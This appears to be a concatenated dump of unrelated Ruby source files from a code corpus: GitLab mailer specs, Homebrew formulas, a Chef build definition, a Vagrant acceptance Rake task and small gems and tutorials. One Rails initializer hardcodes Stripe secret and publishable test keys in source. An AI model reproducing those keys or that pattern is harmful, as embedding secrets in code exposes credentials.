it 'has the characteristics of a threaded reply' do
host = Gitlab.config.gitlab.host
route_key = "#{model.class.model_name.singular_route_key}_#{model.id}"
aggregate_failures do
is_expected.to have_header('Message-ID', /\A<.*@#{host}>\Z/)
is_expected.to have_header('In-Reply-To', "<#{route_key}@#{host}>")
is_expected.to have_header('References', /\A<reply\-.*@#{host}> <#{route_key}@#{host}>\Z/ )
is_expected.to have_subject(/^Re: /)
end
end
end
RSpec.shared_examples 'an email starting a new thread with reply-by-email enabled' do
include_examples 'an email with X-GitLab headers containing project details'
include_examples 'an email with X-GitLab headers containing IDs'
include_examples 'a new thread email with reply-by-email enabled'
it 'includes "Reply to this email directly or <View it on GitLab>"' do
expect(subject.default_part.body).to include(%(Reply to this email directly or <a href="#{Gitlab::UrlBuilder.build(model)}">view it on GitLab</a>.))
end
context 'when reply-by-email is enabled with incoming address with %{key}' do
it 'has a Reply-To header' do
is_expected.to have_header 'Reply-To', /<reply+(.*)@#{Gitlab.config.gitlab.host}>\Z/
end
end
context 'when reply-by-email is enabled with incoming address without %{key}' do
include_context 'reply-by-email is enabled with incoming address without %{key}'
include_examples 'a new thread email with reply-by-email enabled'
it 'has a Reply-To header' do
is_expected.to have_header 'Reply-To', /<reply@#{Gitlab.config.gitlab.host}>\Z/
end
end
end
RSpec.shared_examples 'an answer to an existing thread with reply-by-email enabled' do
include_examples 'an email with X-GitLab headers containing project details'
include_examples 'an email with X-GitLab headers containing IDs'
include_examples 'a thread answer email with reply-by-email enabled'
context 'when reply-by-email is enabled with incoming address with %{key}' do
it 'has a Reply-To header' do
is_expected.to have_header 'Reply-To', /<reply+(.*)@#{Gitlab.config.gitlab.host}>\Z/
end
end
context 'when reply-by-email is enabled with incoming address without %{key}' do
include_context 'reply-by-email is enabled with incoming address without %{key}'
include_examples 'a thread answer email with reply-by-email enabled'
it 'has a Reply-To header' do
is_expected.to have_header 'Reply-To', /<reply@#{Gitlab.config.gitlab.host}>\Z/
end
end
end
RSpec.shared_examples 'it should have Gmail Actions links' do
it do
aggregate_failures do
is_expected.to have_body_text('<script type="application/ld+json">')
is_expected.to have_body_text('ViewAction')
end
end
end
RSpec.shared_examples 'it should not have Gmail Actions links' do
it do
aggregate_failures do
is_expected.not_to have_body_text('<script type="application/ld+json">')
is_expected.not_to have_body_text('ViewAction')
end
end
end
RSpec.shared_examples 'it should show Gmail Actions View Issue link' do
it_behaves_like 'it should have Gmail Actions links'
it { is_expected.to have_body_text('View Issue') }
end
RSpec.shared_examples 'it should show Gmail Actions View Merge request link' do
it_behaves_like 'it should have Gmail Actions links'
it { is_expected.to have_body_text('View Merge request') }
end
RSpec.shared_examples 'it should show Gmail Actions View Commit link' do
it_behaves_like 'it should have Gmail Actions links'
it { is_expected.to have_body_text('View Commit') }
end
RSpec.shared_examples 'an unsubscribeable thread' do
it_behaves_like 'an unsubscribeable thread with incoming address without %{key}'
it 'has a List-Unsubscribe header in the correct format, and a body link' do
aggregate_failures do
is_expected.to have_header('List-Unsubscribe', /unsubscribe/)
is_expected.to have_header('List-Unsubscribe', /mailto/)
is_expected.to have_header('List-Unsubscribe', /^<.+,.+>$/)
is_expected.to have_body_text('unsubscribe')
end
end
end
RSpec.shared_examples 'an unsubscribeable thread with incoming address without %{key}' do
include_context 'reply-by-email is enabled with incoming address without %{key}'
it 'has a List-Unsubscribe header in the correct format, and a body link' do
aggregate_failures do
is_expected.to have_header('List-Unsubscribe', /unsubscribe/)
is_expected.not_to have_header('List-Unsubscribe', /mailto/)
is_expected.to have_header('List-Unsubscribe', /^<[^,]+>$/)
is_expected.to have_body_text('unsubscribe')
end
end
end
RSpec.shared_examples 'a user cannot unsubscribe through footer link' do
it 'does not have a List-Unsubscribe header or a body link' do
aggregate_failures do
is_expected.not_to have_header('List-Unsubscribe', /unsubscribe/)
is_expected.not_to have_body_text('unsubscribe')
end
end
end
RSpec.shared_examples 'an email with a labels subscriptions link in its footer' do
it { is_expected.to have_body_text('label subscriptions') }
end
RSpec.shared_examples 'a note email' do
it_behaves_like 'it should have Gmail Actions links'
it 'is sent to the given recipient as the author' do
sender = subject.header[:from].addrs[0]
aggregate_failures do
expect(sender.display_name).to eq(note_author.name)
expect(sender.address).to eq(gitlab_sender)
expect(subject).to deliver_to(recipient.notification_email)
end
end
it 'contains the message from the note' do
is_expected.to have_body_text note.note
end
it 'contains a link to note author' do
is_expected.to have_body_text note.author_name
end
end
RSpec.shared_examples 'appearance header and footer enabled' do
it "contains header and footer" do
create :appearance, header_message: "Foo", footer_message: "Bar", email_header_and_footer_enabled: true
aggregate_failures do
expect(subject.html_part).to have_body_text("<div class=\"header-message\" style=\"\"><p>Foo</p></div>")
expect(subject.html_part).to have_body_text("<div class=\"footer-message\" style=\"\"><p>Bar</p></div>")
expect(subject.text_part).to have_body_text(/^Foo/)
expect(subject.text_part).to have_body_text(/Bar$/)
end
end
end
RSpec.shared_examples 'appearance header and footer not enabled' do
it "does not contain header and footer" do
create :appearance, header_message: "Foo", footer_message: "Bar", email_header_and_footer_enabled: false
aggregate_failures do
expect(subject.html_part).not_to have_body_text("<div class=\"header-message\" style=\"\"><p>Foo</p></div>")
expect(subject.html_part).not_to have_body_text("<div class=\"footer-message\" style=\"\"><p>Bar</p></div>")
expect(subject.text_part).not_to have_body_text(/^Foo/)
expect(subject.text_part).not_to have_body_text(/Bar$/)
end
end
end
RSpec.shared_examples 'no email is sent' do
it 'does not send an email' do
expect(subject.message).to be_a_kind_of(ActionMailer::Base::NullMail)
end
end
RSpec.shared_examples 'does not render a manage notifications link' do
it do
aggregate_failures do
expect(subject).not_to have_body_text("Manage all notifications")
expect(subject).not_to have_body_text(profile_notifications_url)
end
end
end
| 37.133333 | 152 | 0.73174 |
4a507e61a21420b816316575f364c04151218c3a | 1,727 | class GitTown < Formula
desc "High-level command-line interface for Git"
homepage "https://www.git-town.com/"
url "https://github.com/git-town/git-town/archive/v7.4.0.tar.gz"
sha256 "f9ff00839fde70bc9b5024bae9a51d8b00e0bb309c3542ed65be50bb8a13e6a5"
license "MIT"
bottle do
rebuild 1
sha256 cellar: :any_skip_relocation, arm64_big_sur: "81f31ec12cd8abae36633570d7bfb4649e880c13b9312f30009272f6d8b7afe1"
sha256 cellar: :any_skip_relocation, big_sur: "95e2d5299980978b1901814ada3baa3b42a5c38474e042f891ba0aff10bbbeff"
sha256 cellar: :any_skip_relocation, catalina: "9c90e21d837c016a37117bbf04a6cb66e5acda6ea129dd7013a133cbf3e23d72"
sha256 cellar: :any_skip_relocation, mojave: "f54ad1a3ad30a40be97995c2a8abbecc447e4d93966f18fbb43fcfaf65448bfc"
sha256 cellar: :any_skip_relocation, high_sierra: "2ff4e78e7a3472caa0f5961996efd2ef9e4cfc82455363dfb4f9eaebd441cbe7"
sha256 cellar: :any_skip_relocation, x86_64_linux: "98d370ea32f6a733504ccc35f214df73deda583fa45ef58611d990632fd8e0ad"
end
depends_on "go" => :build
def install
system "go", "build", *std_go_args, "-ldflags",
"-X github.com/git-town/git-town/src/cmd.version=v#{version} "\
"-X github.com/git-town/git-town/src/cmd.buildDate=#{Time.new.strftime("%Y/%m/%d")}"
end
test do
assert_match version.to_s, shell_output("#{bin}/git-town version")
system "git", "init"
unless OS.mac?
system "git", "config", "user.email", "[email protected]"
system "git", "config", "user.name", "Your Name"
end
touch "testing.txt"
system "git", "add", "testing.txt"
system "git", "commit", "-m", "Testing!"
system "#{bin}/git-town", "config"
end
end
| 42.121951 | 122 | 0.730168 |
accf8308f27d70c515eb6de22c9785d3d84a40fb | 206 | Rails.configuration.stripe = {
:publishable_key => 'pk_test_HFtPBBUHWHIoJAqmb2YVhhbX',
:secret_key => 'sk_test_5fwH9FxRW7oP3u4eHYLfnPJH'
}
Stripe.api_key = Rails.configuration.stripe[:secret_key]
| 29.428571 | 57 | 0.776699 |
5d353ab4938df63c934392548fae583748b5f6f0 | 40 | module PistePal
VERSION = "1.2.0"
end
| 10 | 19 | 0.675 |
1828c5925ed3addad99508b7f8b0011e674ef241 | 344 | module FbGraph
module Connections
module Noreply
def noreply(options = {})
members = self.connection(:noreply, options)
members.map! do |member|
User.new(member[:id], member.merge(
:access_token => options[:access_token] || self.access_token
))
end
end
end
end
end | 24.571429 | 72 | 0.584302 |
5d4cc6caa1ea4a23cb38cbaf3f00a0048763da2f | 1,284 | cask 'airfoil' do
version '5.8.6'
sha256 '57cd3c272332c9f2398fb2fc6517dfdb757c9b52fbb30e5e317f0bd45f837846'
url 'https://rogueamoeba.com/airfoil/download/Airfoil.zip'
appcast 'https://rogueamoeba.net/ping/versionCheck.cgi?format=sparkle&bundleid=com.rogueamoeba.Airfoil&platform=osx'
name 'Airfoil'
homepage 'https://www.rogueamoeba.com/airfoil/mac/'
auto_updates true
app 'Airfoil/Airfoil Satellite.app'
app 'Airfoil/Airfoil.app'
uninstall delete: '/Library/Audio/Plug-Ins/HAL/InstantOn.driver',
quit: [
'com.rogueamoeba.Airfoil',
'com.rogueamoeba.AirfoilSpeakers',
]
zap trash: [
'~/Library/Application Support/Airfoil',
'~/Library/Application Support/Airfoil Satellite',
'~/Library/Caches/com.rogueamoeba.Airfoil',
'~/Library/Caches/com.rogueamoeba.AirfoilSpeakers',
'~/Library/Preferences/com.rogueamoeba.Airfoil.plist',
'~/Library/Preferences/com.rogueamoeba.AirfoilSpeakers.plist',
'~/Library/Saved Application State/com.rogueamoeba.Airfoil.savedState',
'~/Library/Saved Application State/com.rogueamoeba.AirfoilSpeakers.savedState',
]
end
| 40.125 | 118 | 0.655763 |
6130b3d74ce58d99980a212aa285d08825f0c4c8 | 2,934 | name "chef"
default_version "local_source"
license :project_license
# For the specific super-special version "local_source", build the source from
# the local git checkout. This is what you'd want to occur by default if you
# just ran omnibus build locally.
version("local_source") do
source path: File.expand_path("../..", project.files_path),
# Since we are using the local repo, we try to not copy any files
# that are generated in the process of bundle installing omnibus.
# If the install steps are well-behaved, this should not matter
# since we only perform bundle and gem installs from the
# omnibus cache source directory, but we do this regardless
# to maintain consistency between what a local build sees and
# what a github based build will see.
options: { exclude: [ "omnibus/vendor" ] }
end
# For any version other than "local_source", fetch from github.
if version != "local_source"
source git: "git://github.com/chef/chef.git"
end
# For nokogiri
dependency "libxml2"
dependency "libxslt"
dependency "liblzma"
dependency "zlib"
# ruby and bundler and friends
dependency "ruby"
dependency "rubygems"
dependency "bundler"
# Install all the native gems separately
# Worst offenders first to take best advantage of cache:
dependency "chef-gem-ffi-yajl"
dependency "chef-gem-ohai"
dependency "chef-gem-nokogiri" unless windows?
dependency "chef-gem-libyajl2"
dependency "chef-gem-ruby-prof"
dependency "chef-gem-byebug"
dependency "chef-gem-debug_inspector"
dependency "chef-gem-binding_of_caller"
unless ios_xr? || solaris?
dependency "chef-gem-rbnacl-libsodium"
dependency "chef-gem-bcrypt_pbkdf-ruby"
end
# Now everyone else, in alphabetical order because we don't care THAT much
Dir.entries(File.dirname(__FILE__)).sort.each do |gem_software|
if gem_software =~ /^(chef-gem-.+)\.rb$/
dependency $1
end
end
build do
# This is where we get the definitions below
require_relative "../../files/chef/build-chef"
extend BuildChef
project_env = env.dup
project_env["BUNDLE_GEMFILE"] = project_gemfile
  # Prepare to install: build config, retries, jobs, frozen=true
# TODO Windows install seems to sometimes install already-installed gems such
# as gherkin (and fail as a result) if you use jobs > 1.
create_bundle_config(project_gemfile, retries: 4, jobs: windows? ? 1 : 7, frozen: true)
# Install all the things. Arguments are specified in .bundle/config (see create_bundle_config)
block { log.info(log_key) { "" } }
bundle "install --verbose", env: project_env
# Check that it worked
block { log.info(log_key) { "" } }
bundle "check", env: project_env
# fix up git-sourced gems
properly_reinstall_git_and_path_sourced_gems
install_shared_gemfile
# Check that the final gemfile worked
block { log.info(log_key) { "" } }
bundle "check", env: env, cwd: File.dirname(shared_gemfile)
end
| 33.340909 | 96 | 0.732106 |
79363ab406d056bba3ed2048f48592e28a88bd42 | 1,167 | class Quex < Formula
desc "Generate lexical analyzers"
homepage "http://quex.org/"
url "https://downloads.sourceforge.net/project/quex/DOWNLOAD/quex-0.68.2.tar.gz"
sha256 "b6a9325f92110c52126fec18432d0d6c9bd8a7593bde950db303881aac16a506"
head "https://svn.code.sf.net/p/quex/code/trunk"
bottle do
cellar :any_skip_relocation
sha256 "e5d0e22c8d988408e52ddabcd0b1ddd7e858c6256b1449b919a83f8da5934354" => :high_sierra
sha256 "e5d0e22c8d988408e52ddabcd0b1ddd7e858c6256b1449b919a83f8da5934354" => :sierra
sha256 "e5d0e22c8d988408e52ddabcd0b1ddd7e858c6256b1449b919a83f8da5934354" => :el_capitan
end
def install
libexec.install "quex", "quex-exe.py"
doc.install "README", "demo"
# Use a shim script to set QUEX_PATH on the user's behalf
(bin/"quex").write <<~EOS
#!/bin/bash
QUEX_PATH="#{libexec}" "#{libexec}/quex-exe.py" "$@"
EOS
if build.head?
man1.install "doc/manpage/quex.1"
else
man1.install "manpage/quex.1"
end
end
test do
system bin/"quex", "-i", doc/"demo/C/01-Trivial/simple.qx", "-o", "tiny_lexer"
assert_predicate testpath/"tiny_lexer", :exist?
end
end
| 31.540541 | 93 | 0.713796 |
f7178e3ca8875c9403352d856542c1d65e992991 | 60 | class Meal < ApplicationRecord
belongs_to :category
end
| 15 | 30 | 0.783333 |
2854e06f4b7ea0a08c87484eab4ae362fa3ac84d | 4,851 | require "spec_helper"
require "pry"
describe Liql do
let(:layout) { File.read(File.expand_path("../support/layout.html.liquid", __FILE__)) }
it "has a version number" do
expect(Liql::VERSION).not_to be nil
end
it "binds assigns on static values" do
mapping = Liql.parse(<<-LIQUID)
{% assign foo = 'foo' %}
{% assign bar = 1 %}
{% assign baz = false %}
LIQUID
foo_binding = mapping.bindings["foo"].first
static_foo = Liql::StaticValue.new(value: "foo")
expect(foo_binding).to(be_a(Liql::Variable))
expect(foo_binding.ref).to(eq(static_foo))
bar_binding = mapping.bindings["bar"].first
static_bar = Liql::StaticValue.new(value: 1)
expect(bar_binding).to(be_a(Liql::Variable))
expect(bar_binding.ref).to(eq(static_bar))
baz_binding = mapping.bindings["baz"].first
static_baz = Liql::StaticValue.new(value: false)
expect(baz_binding).to(be_a(Liql::Variable))
expect(baz_binding.ref).to(eq(static_baz))
end
it "binds variables when they're used in mustache" do
mapping = Liql.parse("{{ foo }}")
binding = mapping.bindings["foo"].first
expect(binding).to(be_a(Liql::Variable))
expect(binding.ref).to(be_nil)
end
it "ignores text" do
mapping = Liql.parse("THIS. IS. HTML!")
expect(mapping.bindings).to(be_empty)
end
it "binds all branches for if node" do
mapping = Liql.parse(<<-LIQUID)
{% if foo %}
{{ bar }}
{% elsif baz %}
{{ toto }}
{% endif %}
LIQUID
expect(mapping.bindings.keys).to(eq(%w(foo bar baz toto)))
expect(mapping.bindings.values.map(&:first)).to(all(be_a(Liql::Variable)))
end
it "binds with binops" do
mapping = Liql.parse("{% assign foo = bar != baz %}")
foo_binding = mapping.bindings["foo"].first
bar_binding = mapping.bindings["bar"].first
baz_binding = mapping.bindings["baz"].first
expect(bar_binding).to(be_a(Liql::Variable))
expect(baz_binding).to(be_a(Liql::Variable))
expect(foo_binding).to(be_a(Liql::Variable))
expect(foo_binding.ref).to(eq(Liql::StaticValue.new(value: :bool)))
end
it "binds variables when they're used in filters" do
mapping = Liql.parse("{{ foo | bar: baz: toto | tutu: tata }}")
foo_binding = mapping.bindings["foo"].first
toto_binding = mapping.bindings["toto"].first
expect(foo_binding).to(be_a(Liql::Variable))
expect(toto_binding).to(be_a(Liql::Variable))
end
it "assigns set references" do
mapping = Liql.parse("{% assign foo = bar %}")
foo_binding = mapping.bindings["foo"].first
bar_binding = mapping.bindings["bar"].first
expect(foo_binding.ref).to(eq(bar_binding))
end
it "for node creates a new lexical scope with a reference variable" do
mapping = Liql.parse("{% for foo in foos %}%{% endfor %}")
foos_binding = mapping.bindings["foos"].first
foo_binding = mapping.children.first.bindings["foo"].first
expect(foo_binding).to(be_a(Liql::Variable))
expect(foo_binding.ref).to(eq(foos_binding))
end
it "for node infers that the thing is a collection" do
mapping = Liql.parse("{% for foo in foos %}%{% endfor %}")
foos_binding = mapping.bindings["foos"].first
expect(foos_binding).to(be_a(Liql::Variable))
expect(foos_binding.schema).to(be_a(Liql::CollectionSchema))
expect(foos_binding.schema.item_schema).to(be_nil)
end
it "can augment properties of variables through re-bound variables" do
mapping = Liql.parse(<<-LIQUID)
{% assign p = product %}
{{ p.variants }}
{% assign foo = p %}
{{ foo.handle }}
LIQUID
product_binding = mapping.bindings["product"].first
expect(product_binding).to(be_a(Liql::Variable))
expect(product_binding.properties["variants"]).to(be_a(Liql::Property))
expect(product_binding.properties["handle"]).to(be_a(Liql::Property))
end
it "as_call_tree returns a flat map of bindings" do
scope = Liql::LexicalScope.new(
bindings: {
"foo" => [
Liql::Variable.new(name: "foo", properties: { "bar" => Liql::Property.new(name: "bar")}),
]
}
)
child = scope.add_child_scope
child.bindings = {
"foo" => [
Liql::Variable.new(name: "foo", properties: { "baz" => Liql::Property.new(name: "baz")}),
]
}
bindings = scope.as_call_tree
expect(bindings).to(be_a(Hash))
expect(bindings["foo"].count).to(eq(2))
expect(bindings["foo"][0]).to(
be_a_variable(
Liql::Variable.new(name: "foo", properties: { "bar" => Liql::Property.new(name: "bar")}),
))
expect(bindings["foo"][1]).to(
be_a_variable(
Liql::Variable.new(name: "foo", properties: { "baz" => Liql::Property.new(name: "baz")}),
))
end
it "can augment properties on index-access if the property is a static value"
end
| 33.455172 | 99 | 0.647289 |
18055f1e99512a4eaec6d6f7a842ba87f79ef70e | 499 | class String
def base_conversion(src, dest)
    # Accumulate the value in base `src`, accepting digits and uppercase letters.
    x = self.chars.inject(0) { |acc, c|
      acc * src + (c =~ /\d/ ? c.ord - '0'.ord : c.ord - 'A'.ord + 10)
    }
result = ""
while x > 0
div, mod = x.divmod(dest)
result = (mod + (mod < 10 ? '0'.ord : 'A'.ord - 10)).chr + result
x = div
end
result
end
end
puts [["255", 10, 16],
["111", 2, 10],
["111", 2, 16]].map{ |x| "#{x.inspect} - #{x[0].base_conversion(x[1], x[2])}" }
| 23.761905 | 85 | 0.418838 |
1d579ce6802fcad5d05289cc3897d66600ab2846 | 1,285 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'I18ner/version'
Gem::Specification.new do |spec|
spec.name = "I18ner"
spec.version = I18ner::VERSION
spec.authors = ["Adam Panzer"]
spec.email = ["[email protected]"]
spec.summary = %q{Parse I18n YAML files quickly}
spec.license = "MIT"
# Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
# to allow pushing to a single host or delete this section to allow pushing to any host.
if spec.respond_to?(:metadata)
spec.metadata['allowed_push_host'] = "TODO: Set to 'http://mygemserver.com'"
else
raise "RubyGems 2.0 or newer is required to protect against " \
"public gem pushes."
end
spec.files = `git ls-files -z`.split("\x0").reject do |f|
f.match(%r{^(test|spec|features)/})
end
spec.bindir = "bin"
spec.executables = ['18n']
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 1.14"
spec.add_development_dependency "rake", "~> 10.0"
spec.add_development_dependency "rspec", "~> 3.0"
spec.add_development_dependency "pry"
spec.add_development_dependency 'i18n'
end
| 34.72973 | 96 | 0.669261 |
39f015acec928335eacb41f0a4a1a6cc620e8e7b | 1,339 | # ruby 5-math-and-numbers.rb
num_a = 5.0
num_b = 2.0
# Printing Numbers
print ("A: ")
puts (num_a)
print ("B: ")
puts (num_b)
# <== Printing Calcs ==>
print ("\nSum: ")
puts (num_a + num_b)
print ("Subtraction: ")
puts (num_a - num_b)
print ("Multiplication: ")
puts (num_a * num_b)
print ("Division: ")
puts (num_a / num_b)
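# NOTE: both operands are floats here; with integers Ruby truncates (5 / 2 == 2)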
# NOTE: ^ is bitwise XOR in Ruby (5 ^ 2 == 7), not exponentiation
#print ("Exponential INT: ")
#puts (5^2)
# Use the ** operator for exponentiation instead
print ("Exponential: ")
puts (num_a ** num_b)
print ("Div. Remainder: ")
puts (num_a % num_b)
# Printing in one line, converting to String
puts ("Printing the value after converting to String: " + num_a.to_s())
# Initializing new variables
neg_num_a = -num_a
float_num_a = num_a + 0.7654321
# Printing more Numbers
print ("\nNegative A: ")
puts (neg_num_a)
print (" Float A: ")
puts (float_num_a)
puts ("\nAbsolute number: " + neg_num_a.abs().to_s())
puts (" Rounded Number: " + float_num_a.round().to_s()) # Statistically correct round number
puts (" Ceil Number: " + float_num_a.ceil().to_s()) # Higher number
puts (" Floor Number: " + float_num_a.floor().to_s()) # Lower Number
# Using Math Class methods
puts ("\n~> Math Class Methods")
puts ("Square Root from " + (num_a**2).round().to_s() + ": " + Math.sqrt(num_a**2).to_s())
puts ("Log (10 as base) from " + num_a.to_s() + ": " + Math.log10(num_a).to_s()) | 23.086207 | 92 | 0.646751 |
3859146729323dbd574383c84bb11f8f0ecd6986 | 867 | require_relative '../spec_helper'
require_lib 'reek/report'
RSpec.describe Reek::Report do
describe '.report_class' do
it 'returns the correct class' do
expect(described_class.report_class(:text)).to eq Reek::Report::TextReport
end
end
describe '.location_formatter' do
it 'returns the correct class' do
expect(described_class.location_formatter(:plain)).to eq Reek::Report::Formatter::BlankLocationFormatter
end
end
describe '.heading_formatter' do
it 'returns the correct class' do
expect(described_class.heading_formatter(:quiet)).to eq Reek::Report::Formatter::QuietHeadingFormatter
end
end
describe '.warning_formatter_class' do
it 'returns the correct class' do
expect(described_class.warning_formatter_class(:simple)).to eq Reek::Report::Formatter::SimpleWarningFormatter
end
end
end
| 29.896552 | 116 | 0.745098 |
61303bf726ad75166bcabe031b4541a0887908ed | 1,246 | namespace :acceptance do
desc "displays components that can be tested"
task :components do
exec("vagrant-spec components --config=acceptance/vagrant-spec.config.rb")
end
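  desc "downloads the guest box artifact used by the acceptance tests"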
task :setup do
box = 'alpine/alpine64'
box_version = '3.7.0'
provider_name = 'virtualbox'
box_owner, box_name = box.split('/')
box_path = File.join('acceptance', 'artifacts', "#{provider_name}.box")
if !File.exist?(box_path)
$stderr.puts "Downloading guest box #{box}"
cmd = "curl -Lf -o #{box_path} https://app.vagrantup.com/#{box_owner}/boxes/#{box_name}/versions/#{box_version}/providers/#{provider_name}.box"
result = system(cmd)
if !result
$stderr.puts
$stderr.puts "ERROR: Failed to download guest box #{guest_box} for #{provider_name}!"
exit 1
end
end
end
desc "runs acceptance tests"
task :run do
args = [
"--config=acceptance/vagrant-spec.config.rb",
]
if ENV["COMPONENTS"]
args << "--components=\"#{ENV["COMPONENTS"]}\""
end
command = "vagrant-spec test #{args.join(" ")}"
puts command
puts
exec(command)
end
end
task :acceptance do
Rake::Task['acceptance:setup'].invoke
Rake::Task['acceptance:run'].invoke
end
| 27.086957 | 149 | 0.639647 |